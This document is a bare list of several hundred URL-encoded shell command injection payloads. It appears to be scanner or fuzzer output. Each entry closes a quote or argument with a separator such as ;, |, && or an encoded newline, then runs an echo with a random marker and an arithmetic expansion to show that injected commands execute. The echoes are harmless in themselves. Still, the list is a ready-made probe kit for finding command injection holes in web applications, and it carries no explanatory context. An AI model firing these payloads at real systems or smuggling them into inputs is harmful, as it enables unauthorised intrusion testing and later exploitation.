+%27%26echo%20VFLICS$((40%2B73))$(echo%20VFLICS)VFLICS%7C +%27%26%26echo%20VRMOKO$((94%2B14))$(echo%20VRMOKO)VRMOKO%7C +%27%7Cecho%20TRCDFT$((10%2B45))$(echo%20TRCDFT)TRCDFT%7C +%27%7C%7Cecho%20CSRAQS$((36%2B11))$(echo%20CSRAQS)CSRAQS%7C +%22echo%20QDLIQI$((19%2B0))$(echo%20QDLIQI)QDLIQI +%22%20echo%20UUGDBS$((24%2B48))$(echo%20UUGDBS)UUGDBS +%22;echo%20TOQHQO$((39%2B33))$(echo%20TOQHQO)TOQHQO +%22&echo%20RXWHBL$((29%2B57))$(echo%20RXWHBL)RXWHBL +%22|echo%20WXWDDM$((64%2B94))$(echo%20WXWDDM)WXWDDM +%22||echo%20FICECR$((56%2B81))$(echo%20FICECR)FICECR +%22&&echo%20JFXAMU$((71%2B94))$(echo%20JFXAMU)JFXAMU +%22%0aecho%20KVHIKT$((53%2B91))$(echo%20KVHIKT)KVHIKT +%22%3Becho%20EPABXR$((84%2B49))$(echo%20EPABXR)EPABXR +%22%26echo%20KVAPYG$((73%2B0))$(echo%20KVAPYG)KVAPYG +%22%26%26echo%20BCDGJZ$((39%2B25))$(echo%20BCDGJZ)BCDGJZ +%22%7Cecho%20ASWJBG$((45%2B44))$(echo%20ASWJBG)ASWJBG +%22%7C%7Cecho%20TELPMA$((31%2B37))$(echo%20TELPMA)TELPMA +%22echo%20AHKWJA$((95%2B73))$(echo%20AHKWJA)AHKWJA' +%22%20echo%20UKACTN$((51%2B30))$(echo%20UKACTN)UKACTN' +%22;echo%20NGVTGX$((65%2B7))$(echo%20NGVTGX)NGVTGX' +%22&echo%20XGFFNI$((27%2B72))$(echo%20XGFFNI)XGFFNI' +%22|echo%20ZSRBDN$((11%2B21))$(echo%20ZSRBDN)ZSRBDN' +%22||echo%20ASRSJE$((90%2B76))$(echo%20ASRSJE)ASRSJE' +%22&&echo%20RTDEYI$((53%2B46))$(echo%20RTDEYI)RTDEYI' +%22%0aecho%20FPJHYX$((59%2B74))$(echo%20FPJHYX)FPJHYX' +%22%3Becho%20MFPJMQ$((82%2B20))$(echo%20MFPJMQ)MFPJMQ' +%22%26echo%20AIBILK$((43%2B3))$(echo%20AIBILK)AIBILK' +%22%26%26echo%20WHIDLL$((79%2B18))$(echo%20WHIDLL)WHIDLL' +%22%7Cecho%20ZKFRXV$((90%2B79))$(echo%20ZKFRXV)ZKFRXV' +%22%7C%7Cecho%20GRQVVJ$((32%2B82))$(echo%20GRQVVJ)GRQVVJ' +%22echo%20HVUQLV$((68%2B45))$(echo%20HVUQLV)HVUQLV" +%22%20echo%20PPHMUH$((17%2B73))$(echo%20PPHMUH)PPHMUH" +%22;echo%20SQMNBY$((85%2B74))$(echo%20SQMNBY)SQMNBY" +%22&echo%20GVQEOC$((57%2B36))$(echo%20GVQEOC)GVQEOC" +%22|echo%20KIYTJL$((54%2B29))$(echo%20KIYTJL)KIYTJL" +%22||echo%20SYCJEC$((69%2B95))$(echo%20SYCJEC)SYCJEC" +%22&&echo%20EIUCDV$((83%2B99))$(echo%20EIUCDV)EIUCDV" +%22%0aecho%20VFLNZS$((29%2B83))$(echo%20VFLNZS)VFLNZS" +%22%3Becho%20YEWKQB$((93%2B41))$(echo%20YEWKQB)YEWKQB" +%22%26echo%20LYAPEI$((34%2B37))$(echo%20LYAPEI)LYAPEI" +%22%26%26echo%20YPGEMK$((56%2B16))$(echo%20YPGEMK)YPGEMK" +%22%7Cecho%20FBMNPV$((56%2B92))$(echo%20FBMNPV)FBMNPV" +%22%7C%7Cecho%20OBONRE$((91%2B98))$(echo%20OBONRE)OBONRE" +%22echo%20FGEIMA$((19%2B87))$(echo%20FGEIMA)FGEIMA +%22%20echo%20ZNMUAG$((46%2B92))$(echo%20ZNMUAG)ZNMUAG +%22;echo%20GSRLST$((57%2B23))$(echo%20GSRLST)GSRLST +%22&echo%20IRYPDI$((16%2B41))$(echo%20IRYPDI)IRYPDI +%22|echo%20OJFSCA$((98%2B19))$(echo%20OJFSCA)OJFSCA +%22||echo%20BQPBUE$((6%2B80))$(echo%20BQPBUE)BQPBUE +%22&&echo%20MEFVSC$((80%2B28))$(echo%20MEFVSC)MEFVSC +%22%0aecho%20SMCVFB$((37%2B17))$(echo%20SMCVFB)SMCVFB +%22%3Becho%20ZRKJES$((88%2B77))$(echo%20ZRKJES)ZRKJES +%22%26echo%20OJNZQH$((38%2B58))$(echo%20OJNZQH)OJNZQH +%22%26%26echo%20RKEIHR$((8%2B8))$(echo%20RKEIHR)RKEIHR +%22%7Cecho%20YMPBBD$((78%2B0))$(echo%20YMPBBD)YMPBBD +%22%7C%7Cecho%20VYQXWF$((1%2B91))$(echo%20VYQXWF)VYQXWF +%22echo%20KWRCTG$((97%2B95))$(echo%20KWRCTG)KWRCTG// +%22%20echo%20QUEVJY$((66%2B5))$(echo%20QUEVJY)QUEVJY// +%22;echo%20HBUSJP$((41%2B2))$(echo%20HBUSJP)HBUSJP// +%22&echo%20VZHJIZ$((31%2B26))$(echo%20VZHJIZ)VZHJIZ// +%22|echo%20KASCNP$((90%2B75))$(echo%20KASCNP)KASCNP// +%22||echo%20PLTNLH$((0%2B63))$(echo%20PLTNLH)PLTNLH// +%22&&echo%20ZNVIVL$((97%2B19))$(echo%20ZNVIVL)ZNVIVL// +%22%0aecho%20UCUIPY$((4%2B10))$(echo%20UCUIPY)UCUIPY// +%22%3Becho%20BQSCFC$((0%2B98))$(echo%20BQSCFC)BQSCFC// +%22%26echo%20NCSCZB$((35%2B52))$(echo%20NCSCZB)NCSCZB// +%22%26%26echo%20FRTWQZ$((70%2B78))$(echo%20FRTWQZ)FRTWQZ// +%22%7Cecho%20WWSFKA$((8%2B52))$(echo%20WWSFKA)WWSFKA// +%22%7C%7Cecho%20NDQNYQ$((36%2B54))$(echo%20NDQNYQ)NDQNYQ// +%22echo%20DGHRDE$((18%2B48))$(echo%20DGHRDE)DGHRDE\ +%22%20echo%20MVAZCZ$((73%2B52))$(echo%20MVAZCZ)MVAZCZ\ +%22;echo%20GWGFGD$((21%2B81))$(echo%20GWGFGD)GWGFGD\ +%22&echo%20ZYOSSF$((3%2B73))$(echo%20ZYOSSF)ZYOSSF\ +%22|echo%20FBXOQL$((67%2B71))$(echo%20FBXOQL)FBXOQL\ +%22||echo%20UAVXQP$((39%2B92))$(echo%20UAVXQP)UAVXQP\ +%22&&echo%20LJHQDJ$((6%2B56))$(echo%20LJHQDJ)LJHQDJ\ +%22%0aecho%20UNYMSO$((48%2B29))$(echo%20UNYMSO)UNYMSO\ +%22%3Becho%20IRKBUP$((99%2B87))$(echo%20IRKBUP)IRKBUP\ +%22%26echo%20NFZBSQ$((53%2B70))$(echo%20NFZBSQ)NFZBSQ\ +%22%26%26echo%20JRKOKH$((41%2B85))$(echo%20JRKOKH)JRKOKH\ +%22%7Cecho%20GVEWSC$((69%2B53))$(echo%20GVEWSC)GVEWSC\ +%22%7C%7Cecho%20HUGKZQ$((0%2B67))$(echo%20HUGKZQ)HUGKZQ\ +%22echo%20XVGLRE$((21%2B97))$(echo%20XVGLRE)XVGLRE& +%22%20echo%20NQIVYI$((0%2B58))$(echo%20NQIVYI)NQIVYI& +%22;echo%20CJTVBA$((23%2B42))$(echo%20CJTVBA)CJTVBA& +%22&echo%20CDFCWV$((36%2B22))$(echo%20CDFCWV)CDFCWV& +%22|echo%20LAHTXU$((26%2B18))$(echo%20LAHTXU)LAHTXU& +%22||echo%20FUOMJK$((92%2B23))$(echo%20FUOMJK)FUOMJK& +%22&&echo%20RVDTRJ$((31%2B86))$(echo%20RVDTRJ)RVDTRJ& +%22%0aecho%20TKPCMK$((80%2B65))$(echo%20TKPCMK)TKPCMK& +%22%3Becho%20IAFRMU$((45%2B79))$(echo%20IAFRMU)IAFRMU& +%22%26echo%20CFMBIF$((28%2B65))$(echo%20CFMBIF)CFMBIF& +%22%26%26echo%20BXSPDI$((19%2B54))$(echo%20BXSPDI)BXSPDI& +%22%7Cecho%20RVSWPE$((20%2B81))$(echo%20RVSWPE)RVSWPE& +%22%7C%7Cecho%20FFTCDY$((19%2B95))$(echo%20FFTCDY)FFTCDY& +%22echo%20WDCBUT$((15%2B76))$(echo%20WDCBUT)WDCBUT| +%22%20echo%20VSICUH$((78%2B75))$(echo%20VSICUH)VSICUH| +%22;echo%20YKMMSL$((26%2B29))$(echo%20YKMMSL)YKMMSL| +%22&echo%20YJBRIM$((70%2B55))$(echo%20YJBRIM)YJBRIM| +%22|echo%20SAQMPN$((71%2B20))$(echo%20SAQMPN)SAQMPN| +%22||echo%20YWODEP$((80%2B41))$(echo%20YWODEP)YWODEP| +%22&&echo%20JGZWWL$((44%2B20))$(echo%20JGZWWL)JGZWWL| +%22%0aecho%20QMZUQP$((97%2B31))$(echo%20QMZUQP)QMZUQP| +%22%3Becho%20MDLILU$((59%2B57))$(echo%20MDLILU)MDLILU| +%22%26echo%20QDNJWL$((73%2B61))$(echo%20QDNJWL)QDNJWL| +%22%26%26echo%20FNCMMT$((70%2B94))$(echo%20FNCMMT)FNCMMT| +%22%7Cecho%20HJHZHR$((26%2B15))$(echo%20HJHZHR)HJHZHR| +%22%7C%7Cecho%20CTPJOY$((58%2B42))$(echo%20CTPJOY)CTPJOY| +%22echo%20COJKHQ$((57%2B48))$(echo%20COJKHQ)COJKHQ%27 +%22%20echo%20CMONNY$((1%2B69))$(echo%20CMONNY)CMONNY%27 +%22;echo%20IFLGNR$((31%2B89))$(echo%20IFLGNR)IFLGNR%27 +%22&echo%20CTSDYA$((54%2B8))$(echo%20CTSDYA)CTSDYA%27 +%22|echo%20TIADZA$((14%2B49))$(echo%20TIADZA)TIADZA%27 +%22||echo%20CMLPBA$((44%2B89))$(echo%20CMLPBA)CMLPBA%27 +%22&&echo%20QZUTVR$((14%2B14))$(echo%20QZUTVR)QZUTVR%27 +%22%0aecho%20SVPNNA$((78%2B23))$(echo%20SVPNNA)SVPNNA%27 +%22%3Becho%20DVBSPR$((73%2B13))$(echo%20DVBSPR)DVBSPR%27 +%22%26echo%20LLWODV$((74%2B52))$(echo%20LLWODV)LLWODV%27 +%22%26%26echo%20FXNWMX$((79%2B34))$(echo%20FXNWMX)FXNWMX%27 +%22%7Cecho%20LKRAYZ$((79%2B32))$(echo%20LKRAYZ)LKRAYZ%27 +%22%7C%7Cecho%20LPSQRE$((76%2B2))$(echo%20LPSQRE)LPSQRE%27 +%22echo%20HFMYLX$((51%2B18))$(echo%20HFMYLX)HFMYLX%22 +%22%20echo%20RCJQEC$((82%2B64))$(echo%20RCJQEC)RCJQEC%22 +%22;echo%20BEQETV$((73%2B10))$(echo%20BEQETV)BEQETV%22 +%22&echo%20IRSLRF$((35%2B88))$(echo%20IRSLRF)IRSLRF%22 +%22|echo%20IBSIQJ$((92%2B88))$(echo%20IBSIQJ)IBSIQJ%22 +%22||echo%20DORIYY$((30%2B85))$(echo%20DORIYY)DORIYY%22 +%22&&echo%20GJOLMS$((8%2B3))$(echo%20GJOLMS)GJOLMS%22 +%22%0aecho%20OSZJBG$((54%2B26))$(echo%20OSZJBG)OSZJBG%22 +%22%3Becho%20BPGUEU$((77%2B5))$(echo%20BPGUEU)BPGUEU%22 +%22%26echo%20VGMMDM$((58%2B64))$(echo%20VGMMDM)VGMMDM%22 +%22%26%26echo%20QYVLPC$((24%2B55))$(echo%20QYVLPC)QYVLPC%22 +%22%7Cecho%20EDEEZB$((20%2B80))$(echo%20EDEEZB)EDEEZB%22 +%22%7C%7Cecho%20UJQDXR$((25%2B32))$(echo%20UJQDXR)UJQDXR%22 +%22echo%20ZXCMSF$((31%2B27))$(echo%20ZXCMSF)ZXCMSF%5C%5C +%22%20echo%20RWFBCU$((99%2B46))$(echo%20RWFBCU)RWFBCU%5C%5C +%22;echo%20FUCJMY$((75%2B58))$(echo%20FUCJMY)FUCJMY%5C%5C +%22&echo%20QWXPLL$((32%2B57))$(echo%20QWXPLL)QWXPLL%5C%5C +%22|echo%20XZZPRW$((63%2B45))$(echo%20XZZPRW)XZZPRW%5C%5C +%22||echo%20WMJGBT$((73%2B39))$(echo%20WMJGBT)WMJGBT%5C%5C +%22&&echo%20IMYKBH$((59%2B74))$(echo%20IMYKBH)IMYKBH%5C%5C +%22%0aecho%20QSSUKH$((35%2B92))$(echo%20QSSUKH)QSSUKH%5C%5C +%22%3Becho%20LMRJYU$((40%2B49))$(echo%20LMRJYU)LMRJYU%5C%5C +%22%26echo%20IFPLFI$((38%2B60))$(echo%20IFPLFI)IFPLFI%5C%5C +%22%26%26echo%20DAEOVC$((76%2B21))$(echo%20DAEOVC)DAEOVC%5C%5C +%22%7Cecho%20AITHIZ$((84%2B6))$(echo%20AITHIZ)AITHIZ%5C%5C +%22%7C%7Cecho%20IVDYQE$((21%2B54))$(echo%20IVDYQE)IVDYQE%5C%5C +%22echo%20HOFMJC$((68%2B53))$(echo%20HOFMJC)HOFMJC%2F%2F +%22%20echo%20AXZBUQ$((26%2B11))$(echo%20AXZBUQ)AXZBUQ%2F%2F +%22;echo%20JHIVSM$((44%2B64))$(echo%20JHIVSM)JHIVSM%2F%2F +%22&echo%20OWORKI$((87%2B59))$(echo%20OWORKI)OWORKI%2F%2F +%22|echo%20ANEUHZ$((23%2B22))$(echo%20ANEUHZ)ANEUHZ%2F%2F +%22||echo%20XFBOCN$((61%2B25))$(echo%20XFBOCN)XFBOCN%2F%2F +%22&&echo%20YRTLHO$((69%2B19))$(echo%20YRTLHO)YRTLHO%2F%2F +%22%0aecho%20BAVEIJ$((9%2B64))$(echo%20BAVEIJ)BAVEIJ%2F%2F +%22%3Becho%20PZXCGX$((34%2B78))$(echo%20PZXCGX)PZXCGX%2F%2F +%22%26echo%20BLPHOB$((47%2B53))$(echo%20BLPHOB)BLPHOB%2F%2F +%22%26%26echo%20MWFRFW$((14%2B54))$(echo%20MWFRFW)MWFRFW%2F%2F +%22%7Cecho%20LKHTVK$((30%2B54))$(echo%20LKHTVK)LKHTVK%2F%2F +%22%7C%7Cecho%20BGQCNZ$((2%2B66))$(echo%20BGQCNZ)BGQCNZ%2F%2F +%22echo%20ESVBXV$((89%2B66))$(echo%20ESVBXV)ESVBXV%26 +%22%20echo%20BNDKEW$((39%2B20))$(echo%20BNDKEW)BNDKEW%26 +%22;echo%20BGIYOF$((34%2B50))$(echo%20BGIYOF)BGIYOF%26 +%22&echo%20XDIPPG$((33%2B59))$(echo%20XDIPPG)XDIPPG%26 +%22|echo%20AJPXDT$((8%2B89))$(echo%20AJPXDT)AJPXDT%26 +%22||echo%20JCPPUE$((34%2B90))$(echo%20JCPPUE)JCPPUE%26 +%22&&echo%20RFPQXJ$((16%2B75))$(echo%20RFPQXJ)RFPQXJ%26 +%22%0aecho%20MZNBQO$((65%2B66))$(echo%20MZNBQO)MZNBQO%26 +%22%3Becho%20EQXSGK$((86%2B0))$(echo%20EQXSGK)EQXSGK%26 +%22%26echo%20RWYPHC$((46%2B28))$(echo%20RWYPHC)RWYPHC%26 +%22%26%26echo%20YIKPNA$((95%2B99))$(echo%20YIKPNA)YIKPNA%26 +%22%7Cecho%20FNNAMY$((56%2B18))$(echo%20FNNAMY)FNNAMY%26 +%22%7C%7Cecho%20MNEBSX$((23%2B36))$(echo%20MNEBSX)MNEBSX%26 +%22echo%20DZXQHG$((20%2B46))$(echo%20DZXQHG)DZXQHG%7C +%22%20echo%20GFNYXZ$((0%2B51))$(echo%20GFNYXZ)GFNYXZ%7C +%22;echo%20TJENJF$((97%2B10))$(echo%20TJENJF)TJENJF%7C +%22&echo%20JKZWSO$((16%2B99))$(echo%20JKZWSO)JKZWSO%7C +%22|echo%20RZKEXB$((2%2B63))$(echo%20RZKEXB)RZKEXB%7C +%22||echo%20EYSOOE$((50%2B13))$(echo%20EYSOOE)EYSOOE%7C +%22&&echo%20KCTHKN$((54%2B70))$(echo%20KCTHKN)KCTHKN%7C +%22%0aecho%20LGFSNB$((46%2B9))$(echo%20LGFSNB)LGFSNB%7C +%22%3Becho%20VPPMSS$((65%2B3))$(echo%20VPPMSS)VPPMSS%7C +%22%26echo%20DKZRJM$((95%2B2))$(echo%20DKZRJM)DKZRJM%7C +%22%26%26echo%20AQMHPO$((37%2B73))$(echo%20AQMHPO)AQMHPO%7C +%22%7Cecho%20SQSPCP$((36%2B68))$(echo%20SQSPCP)SQSPCP%7C +%22%7C%7Cecho%20GJECAG$((89%2B5))$(echo%20GJECAG)GJECAG%7C +%7Cecho%20SZVAMO$((82%2B22))$(echo%20SZVAMO)SZVAMO +%7C%20echo%20QXCOXL$((27%2B5))$(echo%20QXCOXL)QXCOXL +;echo%20JPGWRQ$((89%2B36))$(echo%20JPGWRQ)JPGWRQ +&echo%20QPEVFY$((91%2B41))$(echo%20QPEVFY)QPEVFY +|echo%20IXTPRS$((68%2B93))$(echo%20IXTPRS)IXTPRS +||echo%20VEAONC$((56%2B45))$(echo%20VEAONC)VEAONC +&&echo%20NWPTID$((80%2B31))$(echo%20NWPTID)NWPTID +%0aecho%20YBTGCG$((1%2B43))$(echo%20YBTGCG)YBTGCG +%3Becho%20BFFGMX$((91%2B86))$(echo%20BFFGMX)BFFGMX +%26echo%20RYNLFM$((45%2B53))$(echo%20RYNLFM)RYNLFM +%26%26echo%20HKCUQK$((13%2B67))$(echo%20HKCUQK)HKCUQK +%7Cecho%20OSTCOG$((49%2B82))$(echo%20OSTCOG)OSTCOG +%7C%7Cecho%20FZHCCB$((68%2B25))$(echo%20FZHCCB)FZHCCB +echo%20UZYQKP$((76%2B27))$(echo%20UZYQKP)UZYQKP' +%20echo%20OMZNPF$((86%2B96))$(echo%20OMZNPF)OMZNPF' +;echo%20YJRHBX$((4%2B25))$(echo%20YJRHBX)YJRHBX' +&echo%20UDYYJG$((66%2B1))$(echo%20UDYYJG)UDYYJG' +|echo%20LPZYWI$((40%2B14))$(echo%20LPZYWI)LPZYWI' +||echo%20DFNHJP$((83%2B52))$(echo%20DFNHJP)DFNHJP' +&&echo%20ANJDXN$((18%2B20))$(echo%20ANJDXN)ANJDXN' +%0aecho%20RQUCHA$((6%2B94))$(echo%20RQUCHA)RQUCHA' +%3Becho%20WJRNPH$((1%2B15))$(echo%20WJRNPH)WJRNPH' +%26echo%20JUDEXC$((97%2B30))$(echo%20JUDEXC)JUDEXC' +%26%26echo%20PGMBBO$((3%2B90))$(echo%20PGMBBO)PGMBBO' +%7Cecho%20MIBCVM$((5%2B17))$(echo%20MIBCVM)MIBCVM' +%7C%7Cecho%20TKWKEV$((96%2B49))$(echo%20TKWKEV)TKWKEV' +echo%20URWVVO$((0%2B4))$(echo%20URWVVO)URWVVO" +%20echo%20PVBSCV$((25%2B60))$(echo%20PVBSCV)PVBSCV" +;echo%20VBODDE$((78%2B21))$(echo%20VBODDE)VBODDE" +&echo%20TGYKVF$((42%2B14))$(echo%20TGYKVF)TGYKVF" +|echo%20IQBIEF$((77%2B16))$(echo%20IQBIEF)IQBIEF" +||echo%20THDZZM$((55%2B49))$(echo%20THDZZM)THDZZM" +&&echo%20AJIUPP$((67%2B66))$(echo%20AJIUPP)AJIUPP" +%0aecho%20SUTYKL$((12%2B33))$(echo%20SUTYKL)SUTYKL" +%3Becho%20YLZHIS$((5%2B69))$(echo%20YLZHIS)YLZHIS" +%26echo%20EDHTTZ$((57%2B39))$(echo%20EDHTTZ)EDHTTZ" +%26%26echo%20CLFOGI$((20%2B37))$(echo%20CLFOGI)CLFOGI" +%7Cecho%20CDHGHW$((46%2B6))$(echo%20CDHGHW)CDHGHW" +%7C%7Cecho%20DODCOD$((31%2B91))$(echo%20DODCOD)DODCOD" +echo%20VKRABE$((6%2B96))$(echo%20VKRABE)VKRABE +%20echo%20HLPASS$((48%2B61))$(echo%20HLPASS)HLPASS +;echo%20KSVCNW$((0%2B53))$(echo%20KSVCNW)KSVCNW +&echo%20YSZWVH$((93%2B51))$(echo%20YSZWVH)YSZWVH +|echo%20DMMNWK$((14%2B86))$(echo%20DMMNWK)DMMNWK +||echo%20RLINTX$((21%2B20))$(echo%20RLINTX)RLINTX +&&echo%20JXFFUT$((67%2B52))$(echo%20JXFFUT)JXFFUT +%0aecho%20XKMVBL$((16%2B26))$(echo%20XKMVBL)XKMVBL +%3Becho%20JICGBW$((21%2B40))$(echo%20JICGBW)JICGBW +%26echo%20XUKFFI$((79%2B7))$(echo%20XUKFFI)XUKFFI +%26%26echo%20SXYROH$((80%2B44))$(echo%20SXYROH)SXYROH +%7Cecho%20YZLKYH$((87%2B98))$(echo%20YZLKYH)YZLKYH +%7C%7Cecho%20HRETTA$((56%2B9))$(echo%20HRETTA)HRETTA +echo%20UUKZPI$((71%2B35))$(echo%20UUKZPI)UUKZPI// +%20echo%20UNSAJW$((40%2B12))$(echo%20UNSAJW)UNSAJW// +;echo%20RDEQIN$((60%2B72))$(echo%20RDEQIN)RDEQIN// +&echo%20KHEGEQ$((46%2B22))$(echo%20KHEGEQ)KHEGEQ// +|echo%20LRPXWZ$((88%2B39))$(echo%20LRPXWZ)LRPXWZ// +||echo%20ZSBSMD$((90%2B5))$(echo%20ZSBSMD)ZSBSMD// +&&echo%20VRZBVN$((80%2B99))$(echo%20VRZBVN)VRZBVN// +%0aecho%20TRSCUU$((6%2B83))$(echo%20TRSCUU)TRSCUU// +%3Becho%20CKMZMV$((11%2B82))$(echo%20CKMZMV)CKMZMV// +%26echo%20GCKMJW$((96%2B51))$(echo%20GCKMJW)GCKMJW// +%26%26echo%20PNMDUS$((34%2B98))$(echo%20PNMDUS)PNMDUS// +%7Cecho%20XUZUDN$((64%2B48))$(echo%20XUZUDN)XUZUDN// +%7C%7Cecho%20GESUGU$((82%2B60))$(echo%20GESUGU)GESUGU// +echo%20MTWKYX$((89%2B57))$(echo%20MTWKYX)MTWKYX\ +%20echo%20SBCWOI$((11%2B5))$(echo%20SBCWOI)SBCWOI\ +;echo%20HLWPGL$((69%2B63))$(echo%20HLWPGL)HLWPGL\ +&echo%20DQKWMO$((0%2B96))$(echo%20DQKWMO)DQKWMO\ +|echo%20LWFJZZ$((79%2B26))$(echo%20LWFJZZ)LWFJZZ\ +||echo%20GIZMTU$((59%2B20))$(echo%20GIZMTU)GIZMTU\ +&&echo%20DPKVKY$((97%2B15))$(echo%20DPKVKY)DPKVKY\ +%0aecho%20CQEILX$((20%2B83))$(echo%20CQEILX)CQEILX\ +%3Becho%20XWLOVV$((27%2B91))$(echo%20XWLOVV)XWLOVV\ +%26echo%20GAMOJU$((86%2B49))$(echo%20GAMOJU)GAMOJU\ +%26%26echo%20OCTJGM$((17%2B59))$(echo%20OCTJGM)OCTJGM\ +%7Cecho%20OXATGO$((9%2B84))$(echo%20OXATGO)OXATGO\ +%7C%7Cecho%20EUMDZA$((75%2B60))$(echo%20EUMDZA)EUMDZA\ +echo%20NTKKKZ$((98%2B48))$(echo%20NTKKKZ)NTKKKZ& +%20echo%20ROWYVB$((27%2B55))$(echo%20ROWYVB)ROWYVB& +;echo%20BSAABA$((22%2B11))$(echo%20BSAABA)BSAABA& +&echo%20XLLZAF$((16%2B93))$(echo%20XLLZAF)XLLZAF& +|echo%20DTKVRT$((20%2B98))$(echo%20DTKVRT)DTKVRT& +||echo%20RJENUY$((95%2B27))$(echo%20RJENUY)RJENUY& +&&echo%20YLPPIG$((46%2B74))$(echo%20YLPPIG)YLPPIG& +%0aecho%20RXYLFZ$((20%2B86))$(echo%20RXYLFZ)RXYLFZ& +%3Becho%20OHFUJG$((48%2B14))$(echo%20OHFUJG)OHFUJG& +%26echo%20CWOFVZ$((5%2B33))$(echo%20CWOFVZ)CWOFVZ& +%26%26echo%20XVKSQG$((73%2B31))$(echo%20XVKSQG)XVKSQG& +%7Cecho%20VSTJXX$((81%2B22))$(echo%20VSTJXX)VSTJXX& +%7C%7Cecho%20VUVMFJ$((74%2B32))$(echo%20VUVMFJ)VUVMFJ& +echo%20EJWKAI$((82%2B9))$(echo%20EJWKAI)EJWKAI| +%20echo%20HVFWAN$((72%2B27))$(echo%20HVFWAN)HVFWAN| +;echo%20ZIRSUJ$((79%2B94))$(echo%20ZIRSUJ)ZIRSUJ| +&echo%20RCNYOU$((2%2B11))$(echo%20RCNYOU)RCNYOU| +|echo%20HHGNAV$((39%2B89))$(echo%20HHGNAV)HHGNAV| +||echo%20DNDMGP$((12%2B45))$(echo%20DNDMGP)DNDMGP| +&&echo%20HGBXKT$((12%2B65))$(echo%20HGBXKT)HGBXKT| +%0aecho%20TFYSCR$((64%2B58))$(echo%20TFYSCR)TFYSCR| +%3Becho%20LSPXCM$((79%2B79))$(echo%20LSPXCM)LSPXCM| +%26echo%20TITLCP$((35%2B27))$(echo%20TITLCP)TITLCP| +%26%26echo%20OUHWFL$((62%2B61))$(echo%20OUHWFL)OUHWFL| +%7Cecho%20ACPWWS$((49%2B8))$(echo%20ACPWWS)ACPWWS| +%7C%7Cecho%20MVZOUV$((29%2B33))$(echo%20MVZOUV)MVZOUV| +echo%20SLHLJI$((31%2B31))$(echo%20SLHLJI)SLHLJI%27 +%20echo%20CBLVPB$((13%2B39))$(echo%20CBLVPB)CBLVPB%27 +;echo%20DIKSWB$((93%2B23))$(echo%20DIKSWB)DIKSWB%27 +&echo%20EIEDPG$((1%2B95))$(echo%20EIEDPG)EIEDPG%27 +|echo%20SSHUWU$((85%2B62))$(echo%20SSHUWU)SSHUWU%27 +||echo%20HEYZBA$((8%2B23))$(echo%20HEYZBA)HEYZBA%27 +&&echo%20FEYLRM$((81%2B59))$(echo%20FEYLRM)FEYLRM%27 +%0aecho%20DINDDL$((2%2B20))$(echo%20DINDDL)DINDDL%27 +%3Becho%20CLWYAX$((98%2B78))$(echo%20CLWYAX)CLWYAX%27 +%26echo%20UMBLZI$((32%2B33))$(echo%20UMBLZI)UMBLZI%27 +%26%26echo%20HOPIIN$((13%2B15))$(echo%20HOPIIN)HOPIIN%27 +%7Cecho%20DSGRDB$((86%2B22))$(echo%20DSGRDB)DSGRDB%27 +%7C%7Cecho%20WQVXFQ$((11%2B54))$(echo%20WQVXFQ)WQVXFQ%27 +echo%20LTOENX$((42%2B36))$(echo%20LTOENX)LTOENX%22 +%20echo%20VKXTTD$((59%2B83))$(echo%20VKXTTD)VKXTTD%22 +;echo%20IBYDJK$((27%2B85))$(echo%20IBYDJK)IBYDJK%22 +&echo%20VLOVLO$((85%2B23))$(echo%20VLOVLO)VLOVLO%22 +|echo%20YARTFJ$((41%2B57))$(echo%20YARTFJ)YARTFJ%22 +||echo%20EPBKKE$((59%2B69))$(echo%20EPBKKE)EPBKKE%22 +&&echo%20VEBSDL$((18%2B99))$(echo%20VEBSDL)VEBSDL%22 +%0aecho%20OPVAFF$((48%2B62))$(echo%20OPVAFF)OPVAFF%22 +%3Becho%20FMKLWP$((66%2B12))$(echo%20FMKLWP)FMKLWP%22 +%26echo%20YCWTLN$((43%2B74))$(echo%20YCWTLN)YCWTLN%22 +%26%26echo%20YKZSCO$((10%2B70))$(echo%20YKZSCO)YKZSCO%22 +%7Cecho%20KMHHPF$((93%2B77))$(echo%20KMHHPF)KMHHPF%22 +%7C%7Cecho%20SRPIFR$((51%2B42))$(echo%20SRPIFR)SRPIFR%22 +echo%20PXZDJA$((86%2B79))$(echo%20PXZDJA)PXZDJA%5C%5C +%20echo%20THCQQN$((0%2B88))$(echo%20THCQQN)THCQQN%5C%5C +;echo%20OSGFBJ$((4%2B40))$(echo%20OSGFBJ)OSGFBJ%5C%5C +&echo%20OSUMBG$((2%2B75))$(echo%20OSUMBG)OSUMBG%5C%5C +|echo%20QVGNVW$((11%2B26))$(echo%20QVGNVW)QVGNVW%5C%5C +||echo%20PNTMBC$((8%2B17))$(echo%20PNTMBC)PNTMBC%5C%5C +&&echo%20SGBEKO$((44%2B10))$(echo%20SGBEKO)SGBEKO%5C%5C +%0aecho%20FUZHOM$((22%2B69))$(echo%20FUZHOM)FUZHOM%5C%5C +%3Becho%20FXYIAP$((22%2B40))$(echo%20FXYIAP)FXYIAP%5C%5C +%26echo%20FEBSKN$((28%2B4))$(echo%20FEBSKN)FEBSKN%5C%5C +%26%26echo%20YAIFIN$((82%2B83))$(echo%20YAIFIN)YAIFIN%5C%5C +%7Cecho%20HSVDWC$((31%2B24))$(echo%20HSVDWC)HSVDWC%5C%5C +%7C%7Cecho%20HXJEXE$((93%2B89))$(echo%20HXJEXE)HXJEXE%5C%5C +echo%20CDGATY$((12%2B29))$(echo%20CDGATY)CDGATY%2F%2F +%20echo%20XHVOFZ$((83%2B80))$(echo%20XHVOFZ)XHVOFZ%2F%2F +;echo%20XSFSQB$((48%2B74))$(echo%20XSFSQB)XSFSQB%2F%2F +&echo%20CXWXBB$((97%2B33))$(echo%20CXWXBB)CXWXBB%2F%2F +|echo%20YSISTZ$((83%2B82))$(echo%20YSISTZ)YSISTZ%2F%2F +||echo%20OSDDFQ$((3%2B39))$(echo%20OSDDFQ)OSDDFQ%2F%2F +&&echo%20RPUZNC$((77%2B38))$(echo%20RPUZNC)RPUZNC%2F%2F +%0aecho%20THLXXR$((89%2B18))$(echo%20THLXXR)THLXXR%2F%2F +%3Becho%20DXYJDU$((98%2B7))$(echo%20DXYJDU)DXYJDU%2F%2F +%26echo%20XOVEHW$((64%2B7))$(echo%20XOVEHW)XOVEHW%2F%2F +%26%26echo%20NSDCQT$((87%2B20))$(echo%20NSDCQT)NSDCQT%2F%2F +%7Cecho%20LZYGCY$((26%2B70))$(echo%20LZYGCY)LZYGCY%2F%2F +%7C%7Cecho%20OUUQGP$((77%2B65))$(echo%20OUUQGP)OUUQGP%2F%2F +echo%20BKRXCQ$((95%2B40))$(echo%20BKRXCQ)BKRXCQ%26 